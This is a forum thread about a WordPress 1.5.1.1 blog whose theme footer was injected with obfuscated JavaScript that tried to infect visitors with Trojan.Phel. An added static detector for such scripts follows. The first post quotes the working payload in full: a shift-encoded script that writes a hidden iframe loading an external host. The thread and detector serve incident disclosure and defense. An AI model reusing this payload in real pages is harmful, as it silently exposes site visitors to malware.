Trojan.Phel.A and WordPress 1.5.1.1 (2 posts)

  1. quasistoic
    Member
    Posted 8 years ago

    This is just an FYI in case others experience a similar problem. The below is quoted from an email I sent to my webhost to let them know that the problem (which I had reported earlier in the day) was on my end and not theirs.

    When Windows SP2 IE users were accessing my WordPress 1.5.1.1 blog ( http://quasistoic.org/ts/ ), some rogue javascript was trying to infect their machine with what appears to be Trojan.Phel.

    Related documents (based on VirusScan and NortonAV alerts):
    http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html
    http://vil.nai.com/vil/content/v_130604.htm
    http://vil.mcafeesecurity.com/vil/content/v_130610.htm
    http://vil.nai.com/vil/content/v_130609.htm
    http://vil.nai.com/vil/content/v_100749.htm
    http://vil.nai.com/vil/content/v_101033.htm
    http://www.securiteam.com/windowsntfocus/6B00O2KC0C.html

    I found the offending javascript in my /ts/wp-content/themes/default/footer.php file. I'm guessing it got there thanks to a security hole in WP 1.5.1.1. Here it is in all its glory:
    <script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>

    Actions taken: Upgraded to WordPress 1.5.1.3, which addresses a number of security concerns in 1.5.1.1 (and hopefully the one which allowed the script to be inserted into my footer template). I also removed the nasty javascript from my footer template. These actions seem to have fixed the problem.

  2. Jonathan Dingman
    Member
    Posted 8 years ago

    That might have been a template problem and not a problem with WordPress itself. I've never seen this, so you might have also had a damaged package.
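
Added example, not part of either post and not WordPress code: a static check for the pattern in the script quoted in the first post, where a string literal is shifted back by a fixed amount and the result is passed to document.write. The sample template, the example.invalid URL and the function names are constructed for illustration, and string literals containing escaped quotes are assumed not to occur.

```javascript
// Added example. Static check only: the script body is never evaluated.
// Builds the constructed sample; mirrors the "-3" decoder by adding the shift.
function encode(text, shift) {
  return text.split('').map(c => String.fromCharCode(c.charCodeAt(0) + shift)).join('');
}

// Constructed sample input, not the script from the post. example.invalid is a placeholder.
const hidden = '<iframe src="http://example.invalid/" width=1 height=1></iframe>';
const sampleFooter = [
  '<div id="footer"><p>Powered by WordPress</p></div>',
  `<script type="text/javascript">var k='${encode(hidden, 3)}',t=0,h='';` +
    'while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script>',
  '<script type="text/javascript">document.write(new Date().getFullYear());</script>',
  '</body></html>',
].join('\n');

// Returns one finding per inline script that decodes a string literal with a
// fixed character shift and passes the result to document.write.
function findShiftedWrites(source) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  for (const [, body] of source.matchAll(scriptRe)) {
    // Decoder signature: fromCharCode(<var>.charCodeAt(...) - N)
    const loop = /fromCharCode\(\s*(\w+)\.charCodeAt\([^)]*\)\s*-\s*(\d+)\s*\)/.exec(body);
    if (!loop || !/document\.write/.test(body)) continue;
    const name = loop[1];
    const shift = Number(loop[2]);
    // The encoded text is the quoted literal assigned to that variable.
    const lit = new RegExp('\\b' + name + "\\s*=\\s*(['\"])([\\s\\S]*?)\\1").exec(body);
    if (!lit) continue;
    const decoded = lit[2].split('')
      .map(c => String.fromCharCode(c.charCodeAt(0) - shift)).join('');
    const hiddenFrame = /<iframe\b/i.test(decoded) &&
      /(width|height)\s*=\s*["']?[01]\b|visibility\s*:\s*hidden/i.test(decoded);
    findings.push({ shift, decoded, hiddenFrame });
  }
  return findings;
}

for (const f of findShiftedWrites(sampleFooter)) {
  console.log(`shift=${f.shift} hiddenFrame=${f.hiddenFrame}\n${f.decoded}`);
}
```

Run over the contents of each theme template, it reports the decoded markup without rendering it; the plain document.write call in the sample is not reported.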

This topic has been closed to new replies.